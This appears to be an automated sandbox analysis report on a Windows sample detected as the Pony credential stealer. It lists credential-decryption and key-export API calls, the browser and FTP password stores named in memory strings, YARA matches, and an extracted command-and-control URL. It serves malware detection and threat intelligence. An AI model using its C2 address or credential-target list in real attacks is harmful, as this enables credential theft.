Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_004041BC CryptUnprotectData,LocalFree,	1_2_004041BC
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040A5BD CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	1_2_0040A5BD
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040BA2E CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,	1_2_0040BA2E
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040CEA2 lstrlenA,CryptUnprotectData,LocalFree,	1_2_0040CEA2
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040A774 lstrlenA,CryptUnprotectData,LocalFree,	1_2_0040A774
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	12_2_0040D423
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040A364 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,	12_2_0040A364
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040A1A9 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,	12_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_004041BC CryptUnprotectData,LocalFree,	12_2_004041BC
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040A5BD CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,	12_2_0040A5BD
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040BA2E CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,	12_2_0040BA2E
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040CEA2 lstrlenA,CryptUnprotectData,LocalFree,	12_2_0040CEA2
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040A774 lstrlenA,CryptUnprotectData,LocalFree,	12_2_0040A774

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Unpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Unpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404C68
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040890D
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00404FD8
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00403F86
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00409484
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_00408789
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_1_00404C68
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_0040890D
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_1_00404FD8
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_00403F86
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_1_00409484
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_1_00408789
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_2_00404C68
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_0040890D
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	12_2_00404FD8
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_00403F86
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_2_00409484
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_2_00408789
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_1_00404C68
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_0040890D
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	12_1_00404FD8
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_00403F86
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	12_1_00409484
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	12_1_00408789

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNWeb DataLogin Dataloginsorigin_urlpassword_valueusername_valueftp://http://https://moz_loginshostnameencryptedPasswordencryptedUsername\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, Adnexal8.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: Adnexal8.exe	String found in binary or memory: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Adnexal8.exe, 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.phpYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI
Source: Adnexal8.exe, Adnexal8.exe, 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591B
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmp	String found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591W
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=168R
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp, 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651859842.00000000006DF000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/gws_rd=ssl
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/W9
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/searchLMEM

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_00403879 recv,

1_2_00403879

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000002.649420968.000000000072A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Pony

Show sources

Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR	Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
